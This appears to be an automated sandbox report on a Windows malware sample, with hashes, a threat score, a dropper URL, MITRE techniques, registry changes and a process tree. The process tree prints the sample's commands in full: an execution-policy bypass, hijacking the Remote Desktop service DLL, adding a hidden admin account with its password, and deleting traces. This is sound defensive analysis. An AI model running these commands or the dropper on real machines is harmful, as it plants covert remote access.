65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e

Analysis

max time kernel
150s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
01-10-2021 15:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe
Size

5.7MB
MD5

c1e0df4f2321e9375baee3a0a26fba64
SHA1

dcf4d90d2f3fd11f14b5413be5b7dde70ff33f7c
SHA256

65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e
SHA512

4bc74603d8a7a28a0c965cb78d7762c01312cdb6ee7d8be8f822ebb6bf3dbd273ac76c3ad5d0c70f9fa9439981c19a9bed4525f445d7faddb93e9db5a66a0ad7

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
13	1596	powershell.exe
15	1596	powershell.exe
16	1596	powershell.exe
17	1596	powershell.exe
19	1596	powershell.exe
21	1596	powershell.exe
23	1596	powershell.exe
25	1596	powershell.exe
27	1596	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001ab42-358.dat	upx
behavioral1/files/0x000200000001a4f4-359.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
1468	Process not Found
1468	Process not Found

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44D3.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44C2.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44A1.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4414.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI44B2.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_cjtogn5e.axc.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_y0uunai4.w4x.psm1	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
344	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe
496	powershell.exe
496	powershell.exe
496	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
2608	powershell.exe
2608	powershell.exe
2608	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe
1596	powershell.exe
1596	powershell.exe
1596	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
624	Process not Found
624	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	496	powershell.exe
Token: SeIncreaseQuotaPrivilege	496	powershell.exe
Token: SeSecurityPrivilege	496	powershell.exe
Token: SeTakeOwnershipPrivilege	496	powershell.exe
Token: SeLoadDriverPrivilege	496	powershell.exe
Token: SeSystemProfilePrivilege	496	powershell.exe
Token: SeSystemtimePrivilege	496	powershell.exe
Token: SeProfSingleProcessPrivilege	496	powershell.exe
Token: SeIncBasePriorityPrivilege	496	powershell.exe
Token: SeCreatePagefilePrivilege	496	powershell.exe
Token: SeBackupPrivilege	496	powershell.exe
Token: SeRestorePrivilege	496	powershell.exe
Token: SeShutdownPrivilege	496	powershell.exe
Token: SeDebugPrivilege	496	powershell.exe
Token: SeSystemEnvironmentPrivilege	496	powershell.exe
Token: SeRemoteShutdownPrivilege	496	powershell.exe
Token: SeUndockPrivilege	496	powershell.exe
Token: SeManageVolumePrivilege	496	powershell.exe
Token: 33	496	powershell.exe
Token: 34	496	powershell.exe
Token: 35	496	powershell.exe
Token: 36	496	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeIncreaseQuotaPrivilege	2468	powershell.exe
Token: SeSecurityPrivilege	2468	powershell.exe
Token: SeTakeOwnershipPrivilege	2468	powershell.exe
Token: SeLoadDriverPrivilege	2468	powershell.exe
Token: SeSystemProfilePrivilege	2468	powershell.exe
Token: SeSystemtimePrivilege	2468	powershell.exe
Token: SeProfSingleProcessPrivilege	2468	powershell.exe
Token: SeIncBasePriorityPrivilege	2468	powershell.exe
Token: SeCreatePagefilePrivilege	2468	powershell.exe
Token: SeBackupPrivilege	2468	powershell.exe
Token: SeRestorePrivilege	2468	powershell.exe
Token: SeShutdownPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeSystemEnvironmentPrivilege	2468	powershell.exe
Token: SeRemoteShutdownPrivilege	2468	powershell.exe
Token: SeUndockPrivilege	2468	powershell.exe
Token: SeManageVolumePrivilege	2468	powershell.exe
Token: 33	2468	powershell.exe
Token: 34	2468	powershell.exe
Token: 35	2468	powershell.exe
Token: 36	2468	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeIncreaseQuotaPrivilege	2608	powershell.exe
Token: SeSecurityPrivilege	2608	powershell.exe
Token: SeTakeOwnershipPrivilege	2608	powershell.exe
Token: SeLoadDriverPrivilege	2608	powershell.exe
Token: SeSystemProfilePrivilege	2608	powershell.exe
Token: SeSystemtimePrivilege	2608	powershell.exe
Token: SeProfSingleProcessPrivilege	2608	powershell.exe
Token: SeIncBasePriorityPrivilege	2608	powershell.exe
Token: SeCreatePagefilePrivilege	2608	powershell.exe
Token: SeBackupPrivilege	2608	powershell.exe
Token: SeRestorePrivilege	2608	powershell.exe
Token: SeShutdownPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeSystemEnvironmentPrivilege	2608	powershell.exe
Token: SeRemoteShutdownPrivilege	2608	powershell.exe
Token: SeUndockPrivilege	2608	powershell.exe
Token: SeManageVolumePrivilege	2608	powershell.exe
Token: 33	2608	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 640 wrote to memory of 1364	640	65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe	68
PID 640 wrote to memory of 1364	640	65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe	68
PID 1364 wrote to memory of 2460	1364	powershell.exe	70
PID 1364 wrote to memory of 2460	1364	powershell.exe	70
PID 2460 wrote to memory of 2496	2460	csc.exe	71
PID 2460 wrote to memory of 2496	2460	csc.exe	71
PID 1364 wrote to memory of 496	1364	powershell.exe	72
PID 1364 wrote to memory of 496	1364	powershell.exe	72
PID 1364 wrote to memory of 2468	1364	powershell.exe	77
PID 1364 wrote to memory of 2468	1364	powershell.exe	77
PID 1364 wrote to memory of 2608	1364	powershell.exe	81
PID 1364 wrote to memory of 2608	1364	powershell.exe	81
PID 1364 wrote to memory of 3920	1364	powershell.exe	83
PID 1364 wrote to memory of 3920	1364	powershell.exe	83
PID 1364 wrote to memory of 344	1364	powershell.exe	84
PID 1364 wrote to memory of 344	1364	powershell.exe	84
PID 1364 wrote to memory of 2996	1364	powershell.exe	85
PID 1364 wrote to memory of 2996	1364	powershell.exe	85
PID 1364 wrote to memory of 2012	1364	powershell.exe	88
PID 1364 wrote to memory of 2012	1364	powershell.exe	88
PID 2012 wrote to memory of 3712	2012	net.exe	89
PID 2012 wrote to memory of 3712	2012	net.exe	89
PID 1364 wrote to memory of 1000	1364	powershell.exe	90
PID 1364 wrote to memory of 1000	1364	powershell.exe	90
PID 1000 wrote to memory of 3980	1000	cmd.exe	91
PID 1000 wrote to memory of 3980	1000	cmd.exe	91
PID 3980 wrote to memory of 1992	3980	cmd.exe	92
PID 3980 wrote to memory of 1992	3980	cmd.exe	92
PID 1992 wrote to memory of 1128	1992	net.exe	93
PID 1992 wrote to memory of 1128	1992	net.exe	93
PID 1364 wrote to memory of 1576	1364	powershell.exe	94
PID 1364 wrote to memory of 1576	1364	powershell.exe	94
PID 1576 wrote to memory of 3596	1576	cmd.exe	95
PID 1576 wrote to memory of 3596	1576	cmd.exe	95
PID 3596 wrote to memory of 2140	3596	cmd.exe	96
PID 3596 wrote to memory of 2140	3596	cmd.exe	96
PID 2140 wrote to memory of 2456	2140	net.exe	97
PID 2140 wrote to memory of 2456	2140	net.exe	97
PID 3956 wrote to memory of 3084	3956	cmd.exe	101
PID 3956 wrote to memory of 3084	3956	cmd.exe	101
PID 3084 wrote to memory of 576	3084	net.exe	102
PID 3084 wrote to memory of 576	3084	net.exe	102
PID 2252 wrote to memory of 4068	2252	cmd.exe	105
PID 2252 wrote to memory of 4068	2252	cmd.exe	105
PID 4068 wrote to memory of 496	4068	net.exe	106
PID 4068 wrote to memory of 496	4068	net.exe	106
PID 4000 wrote to memory of 3080	4000	cmd.exe	109
PID 4000 wrote to memory of 3080	4000	cmd.exe	109
PID 3080 wrote to memory of 1000	3080	net.exe	110
PID 3080 wrote to memory of 1000	3080	net.exe	110
PID 3712 wrote to memory of 1276	3712	cmd.exe	113
PID 3712 wrote to memory of 1276	3712	cmd.exe	113
PID 1276 wrote to memory of 2084	1276	net.exe	114
PID 1276 wrote to memory of 2084	1276	net.exe	114
PID 2292 wrote to memory of 2468	2292	cmd.exe	117
PID 2292 wrote to memory of 2468	2292	cmd.exe	117
PID 2468 wrote to memory of 2496	2468	net.exe	118
PID 2468 wrote to memory of 2496	2468	net.exe	118
PID 1596 wrote to memory of 396	1596	cmd.exe	121
PID 1596 wrote to memory of 396	1596	cmd.exe	121
PID 396 wrote to memory of 1284	396	net.exe	122
PID 396 wrote to memory of 1284	396	net.exe	122
PID 3852 wrote to memory of 3324	3852	cmd.exe	125
PID 3852 wrote to memory of 3324	3852	cmd.exe	125

C:\Users\Admin\AppData\Local\Temp\65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe
"C:\Users\Admin\AppData\Local\Temp\65a112982cc0d4e56c078c5333ed3553905bf4f3a639f2ff6e056ab518b6290e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1364
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oecrgbpt\oecrgbpt.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF36.tmp" "c:\Users\Admin\AppData\Local\Temp\oecrgbpt\CSC65B6EBA2EC994772843A947D0956998.TMP"
      4⤵
      PID:2496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3920
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:344
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2996
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3712
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3980
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1992
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1128
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1576
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3596
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2140
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2456
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2336
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1264

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3956
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:576

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc icvblpAe /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2252
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc icvblpAe /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc icvblpAe /add
    3⤵
    PID:496

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4000
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1000

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3712
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    3⤵
    PID:2084

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2292
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2496

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc icvblpAe
1⤵
- Suspicious use of WriteProcessMemory
PID:1596
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc icvblpAe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\system32\net1.exe
